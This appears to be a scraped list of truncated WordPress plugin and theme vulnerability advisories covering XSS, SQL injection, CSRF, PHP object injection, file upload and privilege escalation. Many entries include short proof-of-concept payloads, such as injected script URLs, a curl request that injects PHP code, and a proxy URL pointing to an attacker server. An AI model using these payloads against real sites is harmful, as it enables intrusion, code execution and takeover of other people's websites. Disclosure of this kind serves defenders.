Augmented Reality <= 1.2.0 - Unauthenticated PHP File Upload leading to RCE
The elFinder connector used allows upload of PHP files, as the 'uploadAllow' option contains 'text/x-php'. This allows an unauthenticated user to upload PHP files, leading to an RCE vulnerability. The issue is similar to https://wpscan.com/vulnerability/10389 POST...
GDPR CCPA Compliance Support < 2.4 - Unauthenticated PHP Object Injection
The GDPR CCPA Compliance Support WordPress plugin was vulnerable to an Unauthenticated PHP Object Injection security vulnerability. The vulnerability could be triggered within the "njtgdprallowpermissions" Base64 encoded cookie value...
Golo < 1.3.3 - Unauthenticated Reflected XSS
An Unauthenticated Reflected XSS vulnerability was discovered in the Golo theme v1.3.2 for WordPress. https://example.com/?s=%22%3E%3Cimg+src%3Dx+onerror%3DalertXSS%2F%2F%22%3E&posttype=place...
Findus - Directory Listing < 1.1.15 - Authenticated Persistent XSS
An Authenticated Persistent XSS vulnerability was discovered in the «Findus - Directory Listing WordPress Theme», tested version — v1.1.14. The injected payload will trigger in the admin dashboard, in the «My listings» page and on the listing page itself. POST /submit-listing/ HTTP/1.1 Host: example.com...
WP DS FAQ Plus < 1.4.2 - Stored Cross-Site Scripting (XSS)
Weak security checks in the Question form. https://www.youtube.com/watch?v=UPYitCT9xtk...
Selio - Real Estate Directory <= 1.1 - SQL Injection & Persistent XSS
----- SQL Injection: ----- Vulnerable 'id' parameter is https://listing-themes.com/selio-wp/wp-admin/admin.php?page=ownlistingaddlisting=21 ----- Persistent XSS: ----- You need a new user account, then go to any property listing on the website and use 'ENQUIRY FORM' on the right sidebar. Or you...
API Bearer Auth <= 20181229 - Unauthenticated Reflected XSS
The server GET parameter of the swagger/swagger-config.yaml.php file is affected by a reflected XSS issue. /wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=alert"XSS"...
UserPro <= 4.9.34 - Unauthenticated Reflected XSS
Edit WPscanTeam: August 26th, 2019 - Envato Notified September 2nd, 2019 - v4.9.34 released, still vulnerable September 24th, 2019 - v4.9.35 and 4.9.35.1 released, fixing the issue...
Rencontre < 3.2.2 - Authenticated Stored XSS via facebook parameter & SQL Injection
An authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows arbitrary HTML/script code to be executed in the victim's browser when they visit the web site. Affected Version Version: alert'XSS'// Encoded-Payload:...
Simple Membership <= 3.8.4 - Cross-Site Request Forgery (CSRF)
CSRF issue in the Bulk Operation menu tab https://youtu.be/HkTD8DhhwhM https://gofile.io/?c=zWYnLM - CSRF html files...
Gallery Photoblocks < 1.1.43 - Authenticated Reflected XSS
The Gallery PhotoBlocks WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability. When logged in with an account with administrator capabilities: https:///wp-admin/admin.php?page=photoblocks-edit&id="...
Zoner - Real Estate <= 4.1 - Reflected & Stored XSS
Weak security measures, such as poor filtering of input field data, have been discovered in the 'Zoner - Real Estate WordPress Theme'. PoC Stored XSS Injection: Register on the demo website and go to https://zoner.fruitfulcode.com/author/yourlogin/?profile-page=myprofile page. Inside any text field type "...
LiveChat <= 3.7.2 - Unauthenticated Option Update/Reset and Stored XSS
The lack of proper CSRF and Authorisation checks could allow an unauthenticated attacker to update or reset the plugin's settings. Furthermore, when updating the livechatemail option, no sanitisation is performed, leading to a Stored XSS issue in the plugin's settings page. CSRF and XSS fixed in...
UserPro <= 4.9.23 - Unauthenticated Cross-Site Scripting (XSS)
An XSS vulnerability that affects versions 2.13 to 4.9.23. POST /wp-admin/admin-ajax.php Host: domain.com action=userproshortcodetemplate&shortcode=userpro id=1 layout="float" collageperpage="20" emdpaginatetop="1" emdpaginate="1" emdgender="Gender,radi...
ProfileGrid – User Profiles, Groups and Communities <= 2.8.5 - Authenticated Code Execution
The plugin ProfileGrid – User Profiles, Groups and Communities, versions prior to 2.8.6, is vulnerable to Arbitrary Code Execution. An authenticated user with a role as low as Subscriber can execute arbitrary PHP code on websites using the plugin. Send an authenticated POST request to...
File Manager <= 5.0.0 - Information Disclosure
The Giribaz File Manager plugin logged activity related to the plugin in /wp-content/uploads/file-manager/log.txt. If a user edits the wp-config.php file using this plugin, the wp-config.php contents are added to the log file, which is not protected and contains database credentials, salts, etc. These files...
buddypress-xprofile-custom-fields-type 2.6.3 - Authenticated Arbitrary File Deletion
Required user access: any user registered in BuddyPress. $POST 'field' . $fieldid . 'hiddenfile' is not escaped. $POST 'field' . $fieldid . 'deleteimg' is not escaped. Code File: wp-content/plugin/buddypress-xprofile-custom-fields-type/bp-xprofile-custom-fields-type.php Lines: 452, 472, 496, 513,...
MarketPress <= 3.2.6 - PHP Object Injection
The MarketPress plugin (which installs to a directory named wordpress-ecommerce), versions 3.2.6 and prior, is vulnerable to a PHP Object Injection attack from the cart cookie value stored in connection with this plugin. Send an object to the site using the mpglobalcart cookie value and it will be...
Embed Images in Comments <= 0.5 - Unauthenticated Stored XSS
Unescaped src and href attribute replacements allow breaking out of the generated replacement tags. A comment containing the following "image" http://codeseekah.com/1.jpg"onload="alert1".jpg will generate an alert box...
FormCraft - Premium WordPress Form Builder <= v3.2.31 - Authenticated Stored XSS
WordPress FormCraft Premium WordPress Form Builder versions 3.2.31 and below suffer from a persistent Cross-Site Scripting (XSS) vulnerability. Authenticated Stored XSS: the New Form Heading "Heading Text" input field is vulnerable. The payload will execute when the form is displayed...
User Access Manager <= 2.0.8 - Authenticated Reflected Cross-Site Scripting (XSS)
Not patched in 2.0.0 despite what the advisory states. http://www.example.com/wp-admin/admin.php?page=uamusergroup&uamaction=editusergroup&userGroupId=1%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E%3C%22...
My Geo Posts Free <= 1.2 - Unauthenticated PHP Object Injection
The plugin my-geo-posts-free insecurely trusts serialized data submitted over HTTP requests. This exposes the site to a PHP object injection vulnerability as a potential exploit vector. The attack is exploitable over HTTP requests to sites with the my-geo-posts-free plugin. The original researcher notifi...
WP Whois Domain <= 1.0.0 - Unauthenticated Cross-Site Scripting (XSS)
The plugin is still affected and has been closed...
N-Media Website Contact Form with File Upload - Arbitrary File Upload
The website-contact-form-with-file-upload WordPress plugin was affected by an Arbitrary File Upload security vulnerability...
WHIZZ <= 1.0.7 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The WHIZZ WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. http://www.example.com/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin="alert1;"...
Hero Maps Pro <= 2.1.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The hero-maps-pro WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. http://www.example.com/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v="alert1;"...
Infusionsoft Gravity Forms Add-on <= 1.5.11 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The Infusionsoft Gravity Forms Add-on WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. http://www.example.com/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId="alert1;"...
Sola Support Ticket <= 3.12 - XSS & Configuration Change
Any logged-in user with any role and access to wp-admin in any way can update plugin settings, including allowing HTML to be parsed. One can also change any notification message to include JS, which can then be used to obtain information by forgery. Make a POST request to /wp-admin with parameters...
Job Manager <= 0.7.22 - Unauthenticated Stored Cross-Site Scripting (XSS)
The Job Manager WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting (XSS) security vulnerability. Go to the job listings page /index.php/jobs/apply/, then click on "send through your résumé" and add the payload '" to the email field. The JavaScript will be executed on the...
Syndication Links <= 1.0.2 - DOM Cross-Site Scripting (XSS)
The Syndication Links WordPress plugin was affected by a DOM Cross-Site Scripting (XSS) security vulnerability. http://www.example.com/wp-content/plugins/syndication-links/genericons/example.html...
Amazon Product In a Post Plugin - SQL Injection
amazon-product-in-a-post.php - this plugin takes raw user values and uses them to delete from the database. This query can be manipulated to perform SQL injection attacks. Line 40: $tempswe = $wpdb-query"DELETE FROM $wpdb-prefixamazoncache WHERE Cacheid ='$wp-queryvars'appip-cache-id'' LIMIT 1;"; sqlm...
WeeklyNews Premium Theme <= 2.2 - Cross-Site Scripting (XSS)
Vendor confirmed fixed in 2.2.9, although this issue was not mentioned in the changelog. http://www.example.com/?s=test"...
Crayon Syntax Highlighter 2.0 - 2.6.10 - Defacement
The Crayon Syntax Highlighter plugin allows access to the AJAX method 'crayon-theme-editor-save' to any registered user. When called, the AJAX method 'crayon-theme-editor-save' will call the 'save' function within the CrayonThemeEditorWP class, defined in...
Aspose.Words Exporter < 2.0 - Unauthenticated Arbitrary File Download
The Aspose.Words Exporter WordPress plugin was affected by an Arbitrary File Download security vulnerability. The asposedocexporterdownload.php file of the plugin does not restrict access, check permissions or validate the file parameter, allowing an unauthenticated user to download any file from the...
Fraction Theme < 1.1.2 - Privilege Escalation
This vulnerability allows an attacker, either authenticated or unauthenticated, to escalate privileges on the site and obtain an admin account, which may lead to a full site takeover. This will enable user registration: https://example.com/wp-admin/admin-ajax.php?action=otsaveoptions&userscanregister=...
Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&...
Flog <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The last time it was checked the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/flog/silex-plugin-themes/flash-theme/silexserver/cgi/scripts/proxy.php?url=ATTACKERSERVER/test.html with the payload in the test.html file controlled by the attackers...
Ceceppa Multilingua <= 1.5.17 - Authenticated Reflected Cross-Site Scripting
The tab GET parameter in the plugin's settings is vulnerable to reflected XSS attacks. The PoC will be displayed once the issue has been remediated...
Email Subscribers & Newsletters < 4.5.1 - Cross-site Request Forgery in send_test_email()
An attacker could exploit this issue by convincing a user to click a specially crafted URL, which will send emails from the affected user’s WordPress email account. function run var targetUrl = "http://example.com/webpage"; var email = "[email protected]"; var subject = "PoC"; var content = "add...
CM Pop-Up banners < 1.4.11 - Authenticated Stored XSS
When saving a new campaign, a user with editpages capabilities can store scripts in the campaign’s pop-up content. The code can then be executed on every page on the website. A user with the editpages capability can store any script in the pop-up's content. The content is serialized and then save...
wpCentral < 1.5.1 - Improper Access Control to Privilege Escalation
The flaw allowed anybody to escalate their privileges to those of an administrator, as long as subscriber-level registration was enabled on a given WordPress site with the vulnerable plugin installed. 1. Log in as Subscriber. 2. Scrape the page /wp-admin/index.php for the connection key. i.e. vie...
AccessAlly < 3.3.2 - Unauthenticated Arbitrary PHP Code Execution
Prior to version 3.3.2, this plugin allowed arbitrary PHP code execution through the loginerror function. This exploit is out in the wild now and actively being exploited. curl -Ls http://www.example.com/login/?loginerror=%3C?%20$a%20=%20getcwd;%20echo%20$a;%20?%3E...
Contextual Adminbar Color < 0.3 - Authenticated Stored Cross-Site Scripting Issue
The variable $message is not escaped: $message = sanitizetextfield $currentsettings'message' ; Then, it's printed in a value attribute: value="" Edit WPScanTeam: Put the payload below in the custom message field in the plugin's settings page (Tools > Adminbar Settings): " onfocus=alert2...
Computer Repair Shop < 2.0 - Authenticated Stored XSS
Computer Repair Shop is vulnerable to stored XSS. When a user has admin capabilities, malicious code can be submitted through the plugin's options. Fixed in version 2.0. The plugin's options provided a basic HTML validation, which could be bypassed by copying + pasting malicious code into the...
Donorbox 7.1~7.1.1 - Stored Cross-Site Scripting via Shortcode
In Donorbox WordPress plugin, one can perform an XSS attack via the included shortcode by inserting arbitrary HTML attributes. This vulnerability was introduced in v7.1 and fixed in v7.1.2. donate url='/?" autofocus onfocus="alertwindow" abitraryAttributeToValidateShortcodeParsing="'...
WP Google Review Slider <= 6.1 - Authenticated SQL Injection
The tid parameter is vulnerable to SQLi. Note WPScanTeam: v6.1 has been patched directly in the tags https://plugins.trac.wordpress.org/browser/wp-google-places-review-slider/tags/6.1/admin/partials/templatesposts.phpL58. However, the issue can be verified with v6.0. sqlmap identified the following...
Custom Simple RSS <= 2.0.6 - CSRF
CSRF issue in the Custom Simple Rss Plugin https://youtu.be/R0VrTpjaRg https://gofile.io/?c=jmVseA - CSRF html file...
All-in-One WP Migration <= 6.97 - Authenticated Cross-Site Scripting (XSS)
An attacker would already have to be able to either compromise the database or gain access to a user account with high enough privileges to view the backup history, so some damage has already been done, but such an attacker could then also insert some XSS in order to compromise other admin users...
Block WP Login <= 1.3.0 - CSRF and Unauthorised Settings Update
Lack of CSRF and authorisation checks in the bwplconfigureslug function, registered as an admininit action, could allow an attacker, via CSRF or unauthenticated requests to admin-ajax.php, to change the plugin settings located at /wp-admin/options-permalink.php and disable the protection offered. v1.3.1...
MapSVG Lite <= 3.2.3 - Cross-Site Request Forgery (CSRF)
CSRF in the mapsvgsave AJAX method...